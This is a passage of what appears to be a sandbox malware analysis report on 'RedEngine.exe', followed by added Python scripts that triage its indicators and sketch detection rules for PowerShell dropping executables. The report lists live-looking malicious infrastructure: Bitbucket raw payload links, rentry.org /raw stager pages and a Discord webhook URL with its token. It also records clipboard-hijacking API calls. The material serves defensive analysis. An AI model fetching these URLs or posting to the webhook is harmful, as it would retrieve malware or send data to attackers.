                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B928E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                        Source: powershell.exe, 0000001E.00000002.2116052383.00000190B7030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/PAN.ex
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/Window
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/984b882302ec52a90ac71aa3b8aecff3900592a4/P.exe
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B9224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfutureX
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1497421294.000002C8869BE000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1857780070.00000156D218E000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1951262898.000002C498ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781786727.0000019C71A28000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71C46000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3790153059.00000276FF17C000.00000004.00001000.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1271628910563688513/iSNor1MhL11el5i9poMvSd3l-pO6Mm7YcVe7rrm7Jtdksty
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1637003082.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1636121926.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71266000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3778402873.0000019C7119C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45949D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781370507.0000019C71780000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3779932221.0000019C71480000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71C46000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/3022-2
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3778402873.0000019C71120000.00000004.00001000.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3781902079.00000276FE290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B600C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B928E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3789777604.0000019C72BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71BA2000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C716CF000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3779781800.000002768020B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_in_X
Source: powershell.exe, 00000003.00000002.1643088733.000001D468375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B60D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781370507.0000019C71780000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://peps.python.org/pep-0205/
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000003.00000002.1500962112.000001D459067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org
Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/pancek61
Source: powershell.exe, 00000003.00000002.1500962112.000001D458DA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/pancek6111111
Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/pancek61111111111111/raw
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C71736000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.apple.com/en-us/HT20P
Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1637003082.0000019C71620000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1635575570.0000019C71619000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1635575570.0000019C71619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/htmu_
Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3807174492.00007FFB0B5AF000.00000002.00000001.01000000.00000017.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3798203714.00007FFB025BA000.00000002.00000001.01000000.00000016.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1945052701.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.openssl.org/H
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3801436155.00007FFB02B38000.00000008.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://www.python.org/psf/license/
Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: https://www.python.org/psf/license/)
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FFB01998660 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GetLocaleInfoA,GlobalUnlock,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5A8D70 OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5A8BA0 GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5B77F0 ClientToScreen,GetSystemMetrics,GetAsyncKeyState,GetAsyncKeyState,TrackPopupMenu,GetCursorPos,WindowFromPoint
Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000261E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: GetRawInputDatamemstr_6e273257-d
Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5BB830 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState
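The rows above mix three kinds of evidence: URLs recovered from process memory, observed TLS connections, and clipboard API call chains. Most of the URLs (python.org, openssl.org, nuget.org, the IETF and Apple support pages) are documentation and licence strings carried by any PyInstaller, .NET or OpenSSL build and say nothing about contacted infrastructure; the rentry.org entries in powershell.exe memory, one of them a /raw endpoint, are the ones worth pivoting on, and the clppth.exe functions that call SetClipboardData are what distinguishes a clipboard writer from a clipboard reader. The Python script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses rows in the shape shown above (accepting both the separated form and the run-together form that page extraction produces), splits URLs into library noise versus paste-site fetches using an assumed allowlist, groups TLS server endpoints by client port, and flags any process whose function listing calls SetClipboardData. The allowlist, the rentry.org /raw heuristic and the embedded sample rows are assumptions and constructed data for this example.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: a few rows copied in the flat "Source: ... | Finding: value" shape of the report.
# They are embedded only so the script runs offline; the live input would be the full report text.
SAMPLE_ROWS = [
    "Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmp"
    " | String found in binary or memory: https://rentry.org/pancek61111111111111/raw",
    "Source: powershell.exe, 00000003.00000002.1500962112.000001D458F5F000.00000004.00000800.00020000.00000000.sdmp"
    " | String found in binary or memory: https://rentry.org/pancek61",
    "Source: powershell.exe, 00000006.00000002.1366839863.0000018B60D6A000.00000004.00000800.00020000.00000000.sdmp"
    " | String found in binary or memory: https://nuget.org/nuget.exe",
    "Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3801436155.00007FFB02B38000.00000008.00000001.01000000.0000000E.sdmp"
    " | String found in binary or memory: https://www.python.org/psf/license/",
    "Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3807174492.00007FFB0B5AF000.00000002.00000001.01000000.00000017.sdmp"
    " | String found in binary or memory: https://www.openssl.org/H",
    "Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.7:49708 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49709 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49730 version: TLS 1.2",
    r"Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FFB1C5A8D70"
    " OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard",
]

# The separator between the Source column and the finding is optional, so rows whose columns were
# run together by extraction ("...sdmpString found in binary or memory: ...") parse as well.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*"
    r"(?P<kind>String found in binary or memory|HTTPS traffic detected|Network traffic detected|"
    r"Code function|File created|Process created):\s*(?P<val>.*?)\s*$"
)
TLS_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+) version: (TLS [\d.]+)")
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")   # e.g. 42_2_00007FFB1C5A8D70

# Assumed allowlist: hosts that appear in the memory of any Python / .NET / OpenSSL-built binary
# as documentation or licence strings, not as contacted infrastructure.
LIBRARY_HOSTS = {
    "www.python.org", "peps.python.org", "www.openssl.org", "nuget.org", "oneget.org",
    "tools.ietf.org", "support.apple.com", "linuxreviews.org",
}
# Assumed: paste sites are routinely used to host stager text; a /raw endpoint returns the bare body.
PASTE_HOSTS = {"rentry.org"}


def classify_url(url):
    """Bucket a URL found in memory so analysts read the few that matter first."""
    host = urlparse(url).hostname or ""
    if host in LIBRARY_HOSTS:
        return "library-noise"
    if host in PASTE_HOSTS:
        return "payload-fetch" if url.rstrip("/").endswith("/raw") else "paste-site"
    return "review"


def parse_row(line):
    """Split one report row into image name, raw source column, finding kind and value."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    src = m.group("src")
    # Source is either "image.exe, <dump id>, ..." or a full path; keep only the image file name.
    image = src.split(",")[0].strip().replace("\\", "/").rsplit("/", 1)[-1]
    return {"image": image, "source": src, "kind": m.group("kind"), "value": m.group("val")}


def triage(rows):
    urls = defaultdict(list)      # classification -> [(image, url)]
    tls = defaultdict(set)        # server ip -> {client ports}
    clip_writers = set()
    for line in rows:
        row = parse_row(line)
        if row is None:
            continue
        kind, val = row["kind"], row["value"]
        if kind == "String found in binary or memory" and val.startswith(("http://", "https://")):
            urls[classify_url(val)].append((row["image"], val))
        elif kind == "HTTPS traffic detected":
            m = TLS_RE.search(val)
            if m:
                tls[m.group(1)].add(int(m.group(4)))
        elif kind == "Code function":
            # "<func id> api,api,...[,<func id>]": drop the id tokens, keep the API chain.
            tokens = [t.rstrip(":") for t in val.replace(" ", ",").split(",") if t]
            apis = [t for t in tokens if not FUNC_ID_RE.match(t)]
            if "SetClipboardData" in apis:
                clip_writers.add(row["image"])
    return {
        "suspicious_urls": sorted(set(urls["payload-fetch"] + urls["paste-site"])),
        "library_urls": sorted(set(urls["library-noise"])),
        "unclassified_urls": sorted(set(urls["review"])),
        "tls_servers": {ip: sorted(ports) for ip, ports in sorted(tls.items())},
        "clipboard_writers": sorted(clip_writers),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_ROWS), indent=2))
```

Run against a full report, the "suspicious_urls" list is the pivot set for blocking and hunting, "tls_servers" gives the two server IPs plus the client ports that tie each TLS session back to the "HTTP traffic on port" rows, and "clipboard_writers" is the process to look at for clipper behaviour. Anything in "unclassified_urls" still needs a human read; the allowlist only removes the well-known library strings.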

                        System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe
Source: C:\Users\user\Desktop\RedEngine.exe | Process created: Commandline size = 2586
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A730D0 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A730C9 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_648D4C40 WSAStartup,gethostbyname,socket,setsockopt,setsockopt,setsockopt,htons,sendto,sendto,recvfrom,recvfrom,ntohl,ntohl,ntohl,closesocket,WSACleanup,WSAGetLastError,closesocket,WSACleanup,SetLastError,WSAGetLastError,WSACleanup,SetLastError
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_648D3E30: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
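Two of the rows above are the ones a detection engineer would turn into telemetry rules rather than file hashes: powershell.exe writing three .exe files into %APPDATA%\Roaming, and RedEngine.exe spawning a child with a 2586-character command line. The svchost.exe row is the kind of benign file creation that the same rule must not fire on. The script below is an added example, not part of this report, that evaluates both conditions over constructed Sysmon-style events (EventID 11 FileCreate, EventID 1 ProcessCreate). The event schema, the 2000-character threshold, the drop-directory list and the padded placeholder command line are assumptions; the real command line is not reproduced on this page, only its length.

```python
import ntpath

# Constructed Sysmon-style events modelled on the rows above. Field names follow Sysmon
# (Image, TargetFilename, ParentImage, CommandLine); the values are sample data, not the sandbox's raw log.
SAMPLE_EVENTS = [
    {"EventID": 11,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"},
    {"EventID": 11,   # benign negative case taken from the report's svchost.exe row
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp"},
    {"EventID": 1,
     "ParentImage": r"C:\Users\user\Desktop\RedEngine.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Placeholder padded to the 2586-character length the report records; the real argument is not on the page.
     "CommandLine": "powershell.exe -enc " + "A" * 2566},
    {"EventID": 1,    # ordinary interactive PowerShell, must not fire
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Date"},
]

PE_EXTENSIONS = (".exe", ".dll", ".scr")
# Assumed: user-writable directories where a script-host dropping a PE is almost never legitimate.
USER_DROP_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\")
LONG_CMDLINE = 2000   # assumed threshold; the sample's command line was 2586 characters


def basename(path):
    # ntpath handles backslash paths on any host, so the rules run outside Windows too.
    return ntpath.basename(path).lower()


def rule_powershell_drops_pe(ev):
    """FileCreate of a PE under a user drop directory by powershell.exe."""
    if ev.get("EventID") != 11 or basename(ev.get("Image", "")) != "powershell.exe":
        return None
    target = ev.get("TargetFilename", "")
    low = target.lower()
    if low.endswith(PE_EXTENSIONS) and any(d in low for d in USER_DROP_DIRS):
        return f"powershell.exe wrote PE {target}"
    return None


def rule_very_long_command_line(ev):
    """ProcessCreate whose command line is long enough to hide an encoded script."""
    if ev.get("EventID") != 1:
        return None
    n = len(ev.get("CommandLine", ""))
    if n >= LONG_CMDLINE:
        parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
        return f"{parent} -> {child}, command line {n} chars"
    return None


RULES = {
    "powershell_drops_pe_in_appdata": rule_powershell_drops_pe,
    "very_long_command_line": rule_very_long_command_line,
}


def evaluate(events):
    """Return (rule name, summary) for every event that matches a rule, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            msg = rule(ev)
            if msg:
                hits.append((name, msg))
    return hits


if __name__ == "__main__":
    for name, msg in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

The length threshold is the part to tune: Base64-encoded PowerShell regularly runs past 2000 characters in legitimate deployment tooling, so in production the second rule is usually combined with parent-process context (a child of a user-desktop executable, as here, rather than of a management agent) before it is allowed to page anyone.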
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A71820
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A72070
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A79109
Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 11_2_00A74318
